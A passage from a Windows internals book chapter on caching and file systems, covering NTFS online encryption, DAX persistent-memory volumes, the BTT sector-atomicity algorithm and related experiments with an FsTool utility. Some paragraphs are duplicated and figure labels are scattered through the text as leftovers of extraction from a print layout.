dynamically allocated from the nonpaged pool when the IRP is split, the allocation can fail. The I/O
manager resolves this problem with the IoAllocateIrpEx routine. This routine can be used by kernel
drivers for allocating IRPs (like the legacy IoAllocateIrp). But the new routine allocates an extra stack
location and stores any IRP extensions in it. Drivers that request an IRP extension on IRPs allocated by
the new API no longer need to allocate new memory from the nonpaged pool.
Note A storage driver can decide to split an IRP for different reasons—whether or not it
needs to send multiple I/Os to multiple physical devices. The Volume Shadow Copy Driver
(Volsnap.sys), for example, splits the I/O while it needs to read a file from a copy-on-
write volume shadow copy, if the file resides in different sections: on the live volume and
on the Shadow Copy’s differential file (which resides in the System Volume Information
hidden directory).
CHAPTER 11
Caching and file systems
719
Online encryption support
When a file stream is encrypted or decrypted, it is exclusively locked by the NTFS file system driver. This
means that no applications can access the file during the entire encryption or decryption process. For
large files, this limitation can break the file’s availability for many seconds—or even minutes. Clearly
this is not acceptable for large file-server environments.
To resolve this, recent versions of Windows 10 introduced online encryption support. Through the
right synchronization, the NTFS driver is able to perform file encryption and decryption without retaining
exclusive file access. EFS enables online encryption only if the target encryption stream is a data stream
(named or unnamed) and is nonresident. (Otherwise, a standard encryption process starts.) If both condi-
tions are satisfied, the EFS service sends a FSCTL_SET_ENCRYPTION control code to the NTFS driver to set
a flag that enables online encryption.
Online encryption is possible thanks to the EfsBackup attribute (of type LOGGED_UTILITY_STREAM)
and to the introduction of range locks, a new feature that allows the file system driver to lock (in an
exclusive or shared mode) only only a portion of a file. When online encryption is enabled, the
NtfsEncryptDecryptOnline internal function starts the encryption and decryption process by creating
the EfsBackup attribute (and its SCB) and by acquiring a shared lock on the first 2-MB range of the file.
A shared lock means that multiple readers can still read from the file range, but other writers need to
wait until the end of the encryption or decryption operation before they can write new data.
The NTFS driver allocates a 2-MB buffer from the nonpaged pool and reserves some clusters from
the volume, which are needed to represent 2 MB of free space. (The total number of clusters depends
on the volume cluster’s size.) The online encryption function reads the original data from the physical
disk and stores it in the allocated buffer. If BitLocker encryption offload is not enabled (described in the
previous section), the buffer is encrypted using EFS services; otherwise, the BitLocker driver encrypts
the data when the buffer is written to the previously reserved clusters.
At this stage, NTFS locks the entire file for a brief amount of time: only the time needed to remove
the clusters containing the unencrypted data from the original stream’s extent table, assign them to
the EfsBackup non-resident attribute, and replace the removed range of the original stream’s extent
table with the new clusters that contain the newly encrypted data. Before releasing the exclusive lock,
the NTFS driver calculates a new high watermark value and stores it both in the original file in-memory
SCB and in the EFS payload of the EFS alternate data stream. NTFS then releases the exclusive lock. The
clusters that contain the original data are first zeroed out; then, if there are no more blocks to process,
they are eventually freed. Otherwise, the online encryption cycle restarts with the next 2-MB chunk.
The high watermark value stores the file offset that represents the boundary between encrypted
and nonencrypted data. Any concurrent write beyond the watermark can occur in its original form;
other concurrent writes before the watermark need to be encrypted before they can succeed. Writes to
the current locked range are not allowed. Figure 11-72 shows an example of an ongoing online encryp-
tion for a 16-MB file. The first two blocks (2 MB in size) already have been encrypted; the high water-
mark value is set to 4 MB, dividing the file between its encrypted and non-encrypted data. A range lock
is set on the 2-MB block that follows the high watermark. Applications can still read from that block,
but they can’t write any new data (in the latter case, they need to wait). The block’s data is encrypted
720
CHAPTER 11
Caching and file systems
and stored in reserved clusters. When exclusive file ownership is taken, the original block’s clusters are
remapped to the EfsBackup stream (by removing or splitting their entry in the original file’s extent
table and inserting a new entry in the EfsBackup attribute), and the new clusters are inserted in place
of the previous ones. The high watermark value is increased, the file lock is released, and the online
encryption process proceeds to the next stage starting at the 6-MB offset; the previous clusters located
in the EfsBackup stream are concurrently zeroed-out and can be reused for new stages.
Already Encrypted Data
Non-encrypted locked data
$DATA stream
Before the
Encryption Cycle
$DATA stream
After the
Encryption Cycle
$DATA stream
Before the
Next encryption
Cycle
$EfsBackup
Non-encrypted data
New clusters containing encrypted data
0 MB
2 MB
4 MB
6 MB
8 MB
10 MB
12 MB
16 MB
Encrypted
region
High watermark
Non-Encrypted
region
0 MB
2 MB
4 MB
6 MB
8 MB
10 MB
12 MB
16 MB
Encrypted
region
High watermark
Non-Encrypted
region
0 MB
2 MB
4 MB
6 MB
8 MB
10 MB
12 MB
16 MB
Encrypted
region
High watermark
Non-Encrypted
region
End of the
locked range
End of the
locked range
FIGURE 11-72 Example of an ongoing online encryption for a 16MB file.
The new implementation allows NTFS to encrypt or decrypt in place, getting rid of temporary files
(see the previous “Encrypting file data” section for more details). More importantly, it allows NTFS to
perform file encryption and decryption while other applications can still use and modify the target file
stream (the time spent with the exclusive lock hold is small and not perceptible by the application that
is attempting to use the file).
Direct Access (DAX) disks
Persistent memory is an evolution of solid-state disk technology: a new kind of nonvolatile storage
medium that has RAM-like performance characteristics (low latency and high bandwidth), resides on
the memory bus (DDR), and can be used like a standard disk device.
Direct Access Disks (DAX) is the term used by the Windows operating system to refer to such persis-
tent memory technology (another common term used is storage class memory, abbreviated as SCM). A
nonvolatile dual in-line memory module (NVDIMM), shown in Figure 11-73, is an example of this new type
of storage. NVDIMM is a type of memory that retains its contents even when electrical power is removed.
“Dual in-line” identifies the memory as using DIMM packaging. At the time of writing, there are three
different types of NVDIMMs: NVIDIMM-F contains only flash storage; NVDIMM-N, the most common, is
CHAPTER 11
Caching and file systems
721
produced by combining flash storage and traditional DRAM chips on the same module; and NVDIMM-P
has persistent DRAM chips, which do not lose data in event of power failure.
One of the main characteristics of DAX, which is key to its fast performance, is the support of zero-
copy access to persistent memory. This means that many components, like the file system driver and
memory manager, need to be updated to support DAX, which is a disruptive technology.
Windows Server 2016 was the first Windows operating system to supports DAX: the new storage
model provides compatibility with most existing applications, which can run on DAX disks without any
modification. For fastest performance, files and directories on a DAX volume need to be mapped in
memory using memory-mapped APIs, and the volume needs to be formatted in a special DAX mode.
At the time of this writing, only NTFS supports DAX volumes.
FIGURE 11-73 An NVDIMM, which has DRAM and Flash chips. An attached battery or on-board supercapacitors are
needed for maintaining the data in the DRAM chips.
The following sections describe the way in which direct access disks operate and detail the archi-
tecture of the new driver model and the modification on the main components responsible for DAX
volume support: the NTFS driver, memory manager, cache manager, and I/O manager. Additionally,
inbox and third-party file system filter drivers (including mini filters) must also be individually updated
to take full advantage of DAX.
DAX driver model
To support DAX volumes, Windows needed to introduce a brand-new storage driver model. The SCM
Bus Driver (Scmbus.sys) is a new bus driver that enumerates physical and logical persistent memory
(PM) devices on the system, which are attached to its memory bus (the enumeration is performed
thanks to the NFIT ACPI table). The bus driver, which is not considered part of the I/O path, is a primary
bus driver managed by the ACPI enumerator, which is provided by the HAL (hardware abstraction
layer) through the hardware database registry key (HKLM\SYSTEM\CurrentControlSet\Enum\ACPI).
More details about Plug Play Device enumeration are available in Chapter 6 of Part 1.
722
CHAPTER 11
Caching and file systems
Figure 11-74 shows the architecture of the SCM storage driver model. The SCM bus driver creates
two different types of device objects:
I
Physical device objects (PDOs) represent physical PM devices. A NVDIMM device is usually
composed of one or multiple interleaved NVDIMM-N modules. In the former case, the SCM bus
driver creates only one physical device object representing the NVDIMM unit. In the latter case,
it creates two distinct devices that represent each NVDIMM-N module. All the physical devices
are managed by the miniport driver, Nvdimm.sys, which controls a physical NVDIMM and is
responsible for monitoring its health.
I
Functional device objects (FDOs) represent single DAX disks, which are managed by the persis-
tent memory driver, Pmem.sys. The driver controls any byte-addressable interleave sets and is
responsible for all I/O directed to a DAX volume. The persistent memory driver is the class driver
for each DAX disk. (It replaces Disk.sys in the classical storage stack.)
Both the SCM bus driver and the NVDIMM miniport driver expose some interfaces for communica-
tion with the PM class driver. Those interfaces are exposed through an IRP_MJ_PNP major function
by using the IRP_MN_QUERY_INTERFACE request. When the request is received, the SCM bus driver
knows that it should expose its communication interface because callers specify the {8de064ff-b630-
42e4-ea88-6f24c8641175} interface GUID. Similarly, the persistent memory driver requires communica-
tion interface to the NVDIMM devices through the {0079c21b-917e-405e-cea9-0732b5bbcebd} GUID.
Type specific
NVDIMM drivers
Management
status of the
physical NVDIMM
Management
status of the
logical disk
I/O
(block and DAX)
User mode
Kernel mode
ACPI.sys
nvdimm.sys
scmbus.sys
pmem.sys
nvdimm.sys
UAFI
Common PM
disk driver
Does I/O directly
to the NVDIMM
FIGURE 11-74 The SCM Storage driver model.
The new storage driver model implements a clear separation of responsibilities: The PM class driver man-
ages logical disk functionality (open, close, read, write, memory mapping, and so on), whereas NVDIMM
drivers manage the physical device and its health. It will be easy in the future to add support for new types
of NVDIMM by just updating the Nvdimm.sys driver. (Pmem.sys doesn’t need to change.)
DAX volumes
The DAX storage driver model introduces a new kind of volume: the DAX volumes. When a user first
formats a partition through the Format tool, she can specify the /DAX argument to the command line. If
the underlying medium is a DAX disk, and it’s partitioned using the GPT scheme, before creating the basic
disk data structure needed for the NTFS file system, the tool writes the GPT_BASIC_DATA_ ATTRIBUTE_DAX
CHAPTER 11
Caching and file systems
723
flag in the target volume GPT partition entry (which corresponds to bit number 58). A good reference
for the GUID partition table is available at https://en.wikipedia.org/wiki/GUID_Partition_Table.
When the NTFS driver then mounts the volume, it recognizes the flag and sends a STORAGE_
QUERY_PROPERTY control code to the underlying storage driver. The IOCTL is recognized by the SCM
bus driver, which responds to the file system driver with another flag specifying that the underlying
disk is a DAX disk. Only the SCM bus driver can set the flag. Once the two conditions are verified, and as
long as DAX support is not disabled through the HKLM\System\CurrentControlSet \Control\FileSystem\
NtfsEnableDirectAccess registry value, NTFS enables DAX volume support.
DAX volumes are different from the standard volumes mainly because they support zero-copy ac-
cess to the persistent memory. Memory-mapped files provide applications with direct access to the un-
derlying hardware disk sectors (through a mapped view), meaning that no intermediary components
will intercept any I/O. This characteristic provides extreme performance (but as mentioned earlier, can
impact file system filter drivers, including minifilters).
When an application creates a memory-mapped section backed by a file that resides on a DAX vol-
ume, the memory manager asks the file system whether the section should be created in DAX mode,
which is true only if the volume has been formatted in DAX mode, too. When the file is later mapped
through the MapViewOfFile API, the memory manager asks the file system for the physical memory
range of a given range of the file. The file system driver translates the requested file range in one or
more volume relative extents (sector offset and length) and asks the PM disk class driver to translate
the volume extents into physical memory ranges. The memory manager, after receiving the physical
memory ranges, updates the target process page tables for the section to map directly to persistent
storage. This is a truly zero-copy access to storage: an application has direct access to the persistent
memory. No paging reads or paging writes will be generated. This is important; the cache manager is
not involved in this case. We examine the implications of this later in the chapter.
Applications can recognize DAX volumes by using the GetVolumeInformation API. If the returned
flags include FILE_DAX_VOLUME, the volume is formatted with a DAX-compatible file system (only
NTFS at the time of this writing). In the same way, an application can identify whether a file resides on
a DAX disk by using the GetVolumeInformationByHandle API.
Cached and noncached I/O in DAX volumes
Even though memory-mapped I/O for DAX volumes provide zero-copy access to the underlying stor-
age, DAX volumes still support I/O through standard means (via classic ReadFile and WriteFile APIs).
As described at the beginning of the chapter, Windows supports two kinds of regular I/O: cached and
noncached. Both types have significant differences when issued to DAX volumes.
Cached I/O still requires interaction from the cache manager, which, while creating a shared cache
map for the file, requires the memory manager to create a section object that directly maps to the
PM hardware. NTFS is able to communicate to the cache manager that the target file is in DAX-mode
through the new CcInitializeCacheMapEx routine. The cache manager will then copy data from the user
buffer to persistent memory: cached I/O has therefore one-copy access to persistent storage. Note that
cached I/O is still coherent with other memory-mapped I/O (the cache manager uses the same section);
724
CHAPTER 11
Caching and file systems
as in the memory-mapped I/O case, there are still no paging reads or paging writes, so the lazy writer
thread and intelligent read-ahead are not enabled.
One implication of the direct-mapping is that the cache manager directly writes to the DAX disk as
soon as the NtWriteFile function completes. This means that cached I/O is essentially noncached. For
this reason, noncached I/O requests are directly converted by the file system to cached I/O such that
the cache manager still copies directly between the user’s buffer and persistent memory. This kind of
I/O is still coherent with cached and memory-mapped I/O.
NTFS continues to use standard I/O while processing updates to its metadata files. DAX mode I/O
for each file is decided at stream creation time by setting a flag in the stream control block. If a file is
a system metadata file, the attribute is never set, so the cache manager, when mapping such a file,
creates a standard non-DAX file-backed section, which will use the standard storage stack for perform-
ing paging read or write I/Os. (Ultimately, each I/O is processed by the Pmem driver just like for block
volumes, using the sector atomicity algorithm. See the “Block volumes” section for more details.) This
behavior is needed for maintaining compatibility with write-ahead logging. Metadata must not be
persisted to disk before the corresponding log is flushed. So, if a metadata file were DAX mapped, that
write-ahead logging requirement would be broken.
Effects on file system functionality
The absence of regular paging I/O and the application’s ability to directly access persistent memory
eliminate traditional hook points that the file systems and related filters use to implement various
features. Multiple functionality cannot be supported on DAX-enabled volumes, like file encryption,
compressed and sparse files, snapshots, and USN journal support.
In DAX mode, the file system no longer knows when a writable memory-mapped file is modified.
When the memory section is first created, the NTFS file system driver updates the file’s modification
and access times and marks the file as modified in the USN change journal. At the same time, it signals
a directory change notification. DAX volumes are no longer compatible with any kind of legacy filter
drivers and have a big impact on minifilters (filter manager clients). Components like BitLocker and
the volume shadow copy driver (Volsnap.sys) don’t work with DAX volumes and are removed from the
device stack. Because a minifilter no longer knows if a file has been modified, an antimalware file access
scanner, such as one described earlier, can no longer know if it should scan a file for viruses. It needs
to assume, on any handle close, that modification may have occurred. In turn, this significantly harms
performance, so minifilters must manually opt-in to support DAX volumes.
Mapping of executable images
When the Windows loader maps an executable image into memory, it uses memory-mapping services
provided by the memory manager. The loader creates a memory-mapped image section by supplying
the SEC_IMAGE flag to the NtCreateSection API. The flag specifies to the loader to map the section as
an image, applying all the necessary fixups. In DAX mode this mustn’t be allowed to happen; otherwise,
all the relocations and fixups will be applied to the original image file on the PM disk. To correctly deal
CHAPTER 11
Caching and file systems
725
with this problem, the memory manager applies the following strategies while mapping an executable
image stored in a DAX mode volume:
I
If there is already a control area that represents a data section for the binary file (meaning that
an application has opened the image for reading binary data), the memory manager creates an
empty memory-backed image section and copies the data from the existing data section to the
newly created image section; then it applies the necessary fixups.
I
If there are no data sections for the file, the memory manager creates a regular non-DAX image
section, which creates standard invalid prototype PTEs (see Chapter 5 of Part 1 for more details).
In this case, the memory manager uses the standard read and write routines of the Pmem driver
to bring data in memory when a page fault for an invalid access on an address that belongs to
the image-backed section happens.
At the time of this writing, Windows 10 does not support execution in-place, meaning that the load-
er is not able to directly execute an image from DAX storage. This is not a problem, though, because
DAX mode volumes have been originally designed to store data in a very performant way. Execution
in-place for DAX volumes will be supported in future releases of Windows.
EXPERIMENT: Witnessing DAX I/O with Process Monitor
You can witness DAX I/Os using Process Monitor from SysInternals and the FsTool.exe application,
which is available in this book’s downloadable resources. When an application reads or writes from
a memory-mapped file that resides on a DAX-mode volume, the system does not generate any
paging I/O, so nothing is visible to the NTFS driver or to the minifilters that are attached above or
below it. To witness the described behavior, just open Process Monitor, and, assuming that you
have two different volumes mounted as the P: and Q: drives, set the filters in a similar way as illus-
trated in the following figure (the Q: drive is the DAX-mode volume):
EXPERIMENT: Witnessing DAX I/O with Process Monitor
You can witness DAX I/Os using Process Monitor from SysInternals and the FsTool.exe application,
which is available in this book’s downloadable resources. When an application reads or writes from
a memory-mapped file that resides on a DAX-mode volume, the system does not generate any
paging I/O, so nothing is visible to the NTFS driver or to the minifilters that are attached above or
below it. To witness the described behavior, just open Process Monitor, and, assuming that you
have two different volumes mounted as the P: and Q: drives, set the filters in a similar way as illus-
trated in the following figure (the Q: drive is the DAX-mode volume):
726
CHAPTER 11
Caching and file systems
For generating I/O on DAX-mode volumes, you need to simulate a DAX copy using the FsTool
application. The following example copies an ISO image located in the P: DAX block-mode
volume (even a standard volume created on the top of a regular disk is fine for the experiment)
to the DAX-mode “Q:” drive:
P:\>fstool.exe /daxcopy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 489.67 MB/Sec
Press any key to exit...
Process Monitor has captured a trace of the DAX copy operation that confirms the
expected results:
From the trace above, you can see that on the target file (Q:\test.iso), only the
CreateFileMapping operation was intercepted: no WriteFile events are visible. While the copy
was proceeding, only paging I/O on the source file was detected by Process Monitor. These
paging I/Os were generated by the memory manager, which needed to read the data back from
the source volume as the application was generating page faults while accessing the memory-
mapped file.
For generating I/O on DAX-mode volumes, you need to simulate a DAX copy using the FsTool
application. The following example copies an ISO image located in the P: DAX block-mode
volume (even a standard volume created on the top of a regular disk is fine for the experiment)
to the DAX-mode “Q:” drive:
P:\>fstool.exe /daxcopy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 489.67 MB/Sec
Press any key to exit...
Process Monitor has captured a trace of the DAX copy operation that confirms the
expected results:
From the trace above, you can see that on the target file (Q:\test.iso), only the
CreateFileMapping operation was intercepted: no WriteFile events are visible. While the copy
was proceeding, only paging I/O on the source file was detected by Process Monitor. These
paging I/Os were generated by the memory manager, which needed to read the data back from
the source volume as the application was generating page faults while accessing the memory-
mapped file.
CHAPTER 11
Caching and file systems
727
To see the differences between memory-mapped I/O and standard cached I/O, you need to
copy again the file using a standard file copy operation. To see paging I/O on the source file data,
make sure to restart your system; otherwise, the original data remains in the cache:
P:\>fstool.exe /copy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 13 Sec - Transfer Rate: 313.71 MB/s.
Press any key to exit...
If you compare the trace acquired by Process Monitor with the previous one, you can con-
firm that cached I/O is a one-copy operation. The cache manager still copies chunks of memory
between the application-provided buffer and the system cache, which is mapped directly on the
DAX disk. This is confirmed by the fact that again, no paging I/O is highlighted on the target file.
As a last experiment, you can try to start a DAX copy between two files that reside on the
same DAX-mode volume or that reside on two different DAX-mode volumes:
P:\>fstool /daxcopy q:\test.iso q:\test_copy_2.iso
TFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: q:\test.iso.
Target file path: q:\test_copy_2.iso.
Source Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Great! Both the source and the destination reside on a DAX volume.
Performing a full System Speed Copy!
To see the differences between memory-mapped I/O and standard cached I/O, you need to
copy again the file using a standard file copy operation. To see paging I/O on the source file data,
make sure to restart your system; otherwise, the original data remains in the cache:
P:\>fstool.exe /copy p:\Big_image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 13 Sec - Transfer Rate: 313.71 MB/s.
Press any key to exit...
If you compare the trace acquired by Process Monitor with the previous one, you can con-
firm that cached I/O is a one-copy operation. The cache manager still copies chunks of memory
between the application-provided buffer and the system cache, which is mapped directly on the
DAX disk. This is confirmed by the fact that again, no paging I/O is highlighted on the target file.
As a last experiment, you can try to start a DAX copy between two files that reside on the
same DAX-mode volume or that reside on two different DAX-mode volumes:
P:\>fstool /daxcopy q:\test.iso q:\test_copy_2.iso
TFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: q:\test.iso.
Target file path: q:\test_copy_2.iso.
Source Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Great! Both the source and the destination reside on a DAX volume.
Performing a full System Speed Copy!
728
CHAPTER 11
Caching and file systems
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 501.60 MB/Sec
Press any key to exit...
The trace collected in the last experiment demonstrates that memory-mapped I/O on DAX
volumes doesn’t generate any paging I/O. No WriteFile or ReadFile events are visible on either
the source or the target file:
Block volumes
Not all the limitations brought on by DAX volumes are acceptable in certain scenarios. Windows pro-
vides backward compatibility for PM hardware through block-mode volumes, which are managed by
the entire legacy I/O stack as regular volumes used by rotating and SSD disk. Block volumes maintain
existing storage semantics: all I/O operations traverse the storage stack on the way to the PM disk class
driver. (There are no miniport drivers, though, because they’re not needed.) They’re fully compatible
with all existing applications, legacy filters, and minifilter drivers.
Persistent memory storage is able to perform I/O at byte granularity. More accurately, I/O is per-
formed at cache line granularity, which depends on the architecture but is usually 64 bytes. However,
block mode volumes are exposed as standard volumes, which perform I/O at sector granularity (512
bytes or 4 Kbytes). If a write is in progress on a DAX volume, and suddenly the drive experiences a
power failure, the block of data (sector) contains a mix of old and new data. Applications are not pre-
pared to handle such a scenario. In block mode, the sector atomicity is guaranteed by the PM disk class
driver, which implements the Block Translation Table (BTT) algorithm.
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 501.60 MB/Sec
Press any key to exit...
The trace collected in the last experiment demonstrates that memory-mapped I/O on DAX
volumes doesn’t generate any paging I/O. No WriteFile or ReadFile events are visible on either
the source or the target file:
CHAPTER 11
Caching and file systems
729
The BTT, an algorithm developed by Intel, splits available disk space into chunks of up to 512 GB,
called arenas. For each arena, the algorithm maintains a BTT, a simple indirection/lookup that maps an
LBA to an internal block belonging to the arena. For each 32-bit entry in the map, the algorithm uses
the two most significant bits (MSB) to store the status of the block (three states: valid, zeroed, and er-
ror). Although the table maintains the status of each LBA, the BTT algorithm provides sector atomicity
by providing a og area, which contains an array of nfree blocks.
An nfree block contains all the data that the algorithm needs to provide sector atomicity. There are
256 nfree entries in the array; an nfree entry is 32 bytes in size, so the flog area occupies 8 KB. Each
nfree is used by one CPU, so the number of nfrees describes the number of concurrent atomic I/Os an
arena can process concurrently. Figure 11-75 shows the layout of a DAX disk formatted in block mode.
The data structures used for the BTT algorithm are not visible to the file system driver. The BTT algo-
rithm eliminates possible subsector torn writes and, as described previously, is needed even on DAX-
formatted volumes in order to support file system metadata writes.
Arena 0
512GB
Arena Info Block (4K)
Data Blocks
nfree reserved blocks
BTT Map
BTT Flog (8K)
Info Block Copy (4K)
Arena
Arena 1
512GB
Backing Store
•
•
•
FIGURE 11-75 Layout of a DAX disk that supports sector atomicity (BTT algorithm).
Block mode volumes do not have the GPT_BASIC_DATA_ATTRIBUTE_DAX flag in their partition
entry. NTFS behaves just like with normal volumes by relying on the cache manager to perform cached
I/O, and by processing non-cached I/O through the PM disk class driver. The Pmem driver exposes read
and write functions, which performs a direct memory access (DMA) transfer by building a memory
descriptor list (MDL) for both the user buffer and device physical block address (MDLs are described in
more detail in Chapter 5 of Part 1). The BTT algorithm provides sector atomicity. Figure 11-76 shows the
I/O stack of a traditional volume, a DAX volume, and a block volume.
730
CHAPTER 11
Caching and file systems
Traditional
App
NTFS
Volsnap
Volmgr/
Partmgr
Disk/
ClassPnP
StorPort
MiniPort
PM Block Volume
App
DAX Volume
App
User Mode
Kernel Mode
SSD/HDD
NTFS
Volsnap
Volmgr/
Partmgr
PM Disk
Driver
PM
PM
NTFS
Volmgr/
Partmgr
PM Disk
Driver
Memory Mapped
Cached I/O
FIGURE 11-76 Device I/O stack comparison between traditional volumes, block mode volumes, and DAX volumes.
File system filter drivers and DAX
Legacy filter drivers and minifilters don’t work with DAX volumes. These kinds of drivers usually
augment file system functionality, often interacting with all the operations that a file system driver
manages. There are different classes of filters providing new capabilities or modifying existing func-
tionality of the file system driver: antivirus, encryption, replication, compression, Hierarchical Storage
Management (HSM), and so on. The DAX driver model significantly modifies how DAX volumes interact
with such components.
As previously discussed in this chapter, when a file is mapped in memory, the file system in DAX
mode does not receive any read or write I/O requests, neither do all the filter drivers that reside above
or below the file system driver. This means that filter drivers that rely on data interception will not work.
To minimize possible compatibility issues, existing minifilters will not receive a notification (through the
InstanceSetup callback) when a DAX volume is mounted. New and updated minifilter drivers that still
want to operate with DAX volumes need to specify the FLTFL_REGISTRATION_SUPPORT_DAX_VOLUME
flag when they register with the filter manager through FltRegisterFilter kernel API.
Minifilters that decide to support DAX volumes have the limitation that they can’t intercept any
form of paging I/O. Data transformation filters (which provide encryption or compression) don’t
have any chance of working correctly for memory-mapped files; antimalware filters are impacted as
CHAPTER 11
Caching and file systems
731
described earlier—because they must now perform scans on every open and close, losing the ability to
determine whether or not a write truly happened. (The impact is mostly tied to the detection of a file
last update time.) Legacy filters are no longer compatible: if a driver calls the IoAttachDeviceToDevice
Stack API (or similar functions), the I/O manager simply fails the request (and logs an ETW event).
Flushing DAX mode I/Os
Traditional disks (HDD, SSD, NVme) always include a cache that improves their overall performance.
When write I/Os are emitted from the storage driver, the actual data is first transferred into the cache,
which will be written to the persistent medium later. The operating system provides correct flushing,
which guarantees that data is written to final storage, and temporal order, which guarantees that data
is written in the correct order. For normal cached I/O, an application can call the FlushFileBuffers API to
ensure that the data is provably stored on the disk (this will generate an IRP with the IRP_MJ_FLUSH_
BUFFERS major function code that the NTFS driver will implement). Noncached I/O is directly written to
disk by NTFS so ordering and flushing aren’t concerns.
With DAX-mode volumes, this is not possible anymore. After the file is mapped in memory, the
NTFS driver has no knowledge of the data that is going to be written to disk. If an application is writing
some critical data structures on a DAX volume and the power fails, the application has no guarantees
that all of the data structures will have been correctly written in the underlying medium. Furthermore,
it has no guarantees that the order in which the data was written was the requested one. This is
because PM storage is implemented as classical physical memory from the CPU’s point of view. The
processor uses the CPU caching mechanism, which uses its own caching mechanisms while reading or
writing to DAX volumes.
As a result, newer versions of Windows 10 had to introduce new flush APIs for DAX-mapped regions,
which perform the necessary work to optimally flush PM content from the CPU cache. The APIs are
available for both user-mode applications and kernel-mode drivers and are highly optimized based
on the CPU architecture (standard x64 systems use the CLFLUSH and CLWB opcodes, for example). An
application that wants I/O ordering and flushing on DAX volumes can call RtlGetNonVolatileToken on
a PM mapped region; the function yields back a nonvolatile token that can be subsequently used with
the RtlFlushNonVolatileMemory or RtlFlushNonVolatileMemoryRanges APIs. Both APIs perform the
actual flush of the data from the CPU cache to the underlying PM device.
Memory copy operations executed using standard OS functions perform, by default, temporal copy
operations, meaning that data always passes through the CPU cache, maintaining execution ordering.
Nontemporal copy operations, on the other hand, use specialized processor opcodes (again depend-
ing on the CPU architecture; x64 CPUs use the MOVNTI opcode) to bypass the CPU cache. In this case,
ordering is not maintained, but execution is faster. RtlWriteNonVolatileMemory exposes memory copy
operations to and from nonvolatile memory. By default, the API performs classical temporal copy op-
erations, but an application can request a nontemporal copy through the WRITE_NV_MEMORY_FLAG_
NON_ TEMPORAL flag and thus execute a faster copy operation.
732
CHAPTER 11
Caching and file systems
Large and huge pages support
Reading or writing a file on a DAX-mode volume through memory-mapped sections is handled by the
memory manager in a similar way to non-DAX sections: if the MEM_LARGE_PAGES flag is specified at
map time, the memory manager detects that one or more file extents point to enough aligned, contigu-
ous physical space (NTFS allocates the file extents), and uses large (2 MB) or huge (1 GB) pages to map the
physical DAX space. (More details on the memory manager and large pages are available in Chapter 5 of
Part 1.) Large and huge pages have various advantages compared to traditional 4-KB pages. In particular,
they boost the performance on DAX files because they require fewer lookups in the processor’s page
table structures and require fewer entries in the processor’s translation lookaside buffer (TLB). For ap-
plications with a large memory footprint that randomly access memory, the CPU can spend a lot of time
looking up TLB entries as well as reading and writing the page table hierarchy in case of TLB misses. In ad-
dition, using large/huge pages can also result in significant commit savings because only page directory
parents and page directory (for large files only, not huge files) need to be charged. Page table space (4 KB
per 2 MB of leaf VA space) charges are not needed or taken. So, for example, with a 2-TB file mapping, the
system can save 4 GB of committed memory by using large and huge pages.
The NTFS driver cooperates with the memory manager to provide support for huge and large pages
while mapping files that reside on DAX volumes:
I
By default, each DAX partition is aligned on 2-MB boundaries.
I
NTFS supports 2-MB clusters. A DAX volume formatted with 2-MB clusters is guaranteed to use
only large pages for every file stored in the volume.
I
1-GB clusters are not supported by NTFS. If a file stored on a DAX volume is bigger than 1 GB,
and if there are one or more file’s extents stored in enough contiguous physical space, the
memory manager will map the file using huge pages (huge pages use only two pages map
levels, while large pages use three levels).
As introduced in Chapter 5, for normal memory-backed sections, the memory manager uses large
and huge pages only if the extent describing the PM pages is properly aligned on the DAX volume.
(The alignment is relative to the volume’s LCN and not to the file VCN.) For large pages, this means
that the extent needs to start at at a 2-MB boundary, whereas for huge pages it needs to start at 1-GB
boundary. If a file on a DAX volume is not entirely aligned, the memory manager uses large or huge
pages only on those blocks that are aligned, while it uses standard 4-KB pages for any other blocks.
In order to facilitate and increase the usage of large pages, the NTFS file system provides the FSCTL_
SET_DAX_ALLOC_ALIGNMENT_HINT control code, which an application can use to set its preferred
alignment on new file extents. The I/O control code accepts a value that specifies the preferred align-
ment, a starting offset (which allows specifying where the alignment requirements begin), and some
flags. Usually an application sends the IOCTL to the file system driver after it has created a brand-new
file but before mapping it. In this way, while allocating space for the file, NTFS grabs free clusters that
fall within the bounds of the preferred alignment.
If the requested alignment is not available (due to volume high fragmentation, for example), the
IOCTL can specify the fallback behavior that the file system should apply: fail the request or revert to a
fallback alignment (which can be specified as an input parameter). The IOCTL can even be used on an
CHAPTER 11
Caching and file systems
733
already-existing file, for specifying alignment of new extents. An application can query the alignment
of all the extents belonging to a file by using the FSCTL_QUERY_FILE_REGIONS control code or by using
the fsutil dax ueryfilealignment command-line tool.
EXPERIMENT: Playing with DAX file alignment
You can witness the different kinds of DAX file alignment using the FsTool application available
in this book’s downloadable resources. For this experiment, you need to have a DAX volume
present on your machine. Open a command prompt window and perform the copy of a big file
(we suggest at least 4 GB) into the DAX volume using this tool. In the following example, two
DAX disks are mounted as the P: and Q: volumes. The Big_Image.iso file is copied into the Q: DAX
